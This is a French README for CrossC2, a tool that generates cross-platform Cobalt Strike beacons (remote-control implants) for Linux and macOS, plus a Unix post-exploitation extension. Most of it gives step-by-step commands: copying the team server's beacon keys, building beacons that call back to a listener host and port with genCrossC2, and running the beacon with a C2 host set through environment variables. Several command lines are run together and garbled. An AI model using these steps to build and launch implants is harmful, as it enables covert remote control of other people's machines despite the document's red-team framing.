
Générer le payload multiplateforme de CobaltStrike
README | 中文文档 | README_FULL | 中文完整文档
Prend en charge l'évaluation de sécurité de CobaltStrike sur d'autres plateformes (Linux/MacOS/...), et inclut le support de développement du module de post-exploitation Unix.

- Téléchargement
Téléchargez CrossC2.cna genCrossC2 CrossC2Kit, puis modifiez la configuration de CrossC2.cna
- Créer un listener et copier la clé
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys dans le répertoire du serveur d'équipe vers le répertoire local
- Extension de fonctions
CrossC2Kit_Loader.cna, incluant le chargement en mémoire et d'autres fonctionscs4.x est manquante, vous devez utiliser ce Loader et redémarrer
- Générer un beacon
Par défaut, utilisez la fonction GUI fournie par cli ou cna pour générer le beacon
genCrossC2 <ip-domaine-listener> <port-listener> <beacon_keys> <bibliothèque_rebind;config.ini;c2profile.profile> <plateforme_cible> <architecture_cible>
exemple :
1. lire BEACON_KEY depuis le chemin actuel et générer un BEACON avec le protocole de trafic C2Profile par défaut
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. spécifier le BEACON d'une bibliothèque dynamique de protocole personnalisé
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. spécifier le C2Profile à analyser automatiquement
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
Une configuration plus avancée se trouve dans la documentation : 📄Référence
- Exécuter le beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit : https://github.com/CrossC2/CrossC2Kit
CrossC2Kit est une extension d'infiltration autour de la plateforme Unix dérivée de CrossC2. Utilise le moteur de script open source Aggressor Script. Il peut être utilisé pour créer de l'automatisation afin de simuler le processus opérationnel de la Red Team et d'étendre le client CobaltStrike.
CrossC2Kit est hérité des fonctionnalités originales de CobaltStrike, donc la grammaire de développement et d'écriture se réfère toujours à la documentation officielle : https://trial.cobaltstrike.com/aggressor-script/index.html
Mais il possède des extensions d'API supplémentaires sur CrossC2 pour contrôler le beacon de la plateforme Unix
API : 📄Référence
Démo : 
Réservé à un usage interne par les entreprises et les organisations, ce framework présente un certain degré d'instabilité. Les non-professionnels ne sont pas autorisés à l'utiliser. Personne ne doit l'utiliser à des fins illégales ou lucratives. De plus, la publication d'une version modifiée non autorisée est également interdite, sous peine de responsabilités légales.
Merci à @Emma pour le logo conçu pour CrossC2, qui s'inspire du style des séries Armitage et CobaltStrike.
| CS3.14 (corrections de bogues) | CS4.0 | CS4.X (4.1~4.8) |
|---|
| Branche principale | ✅ | ||
| Branche cs4.0 | ✅ | ||
| Branche cs4.1 | ✅ | ||
| Page de version <= v2.1 | ✅ | ||
| Page de version >= v2.2 | ✅ |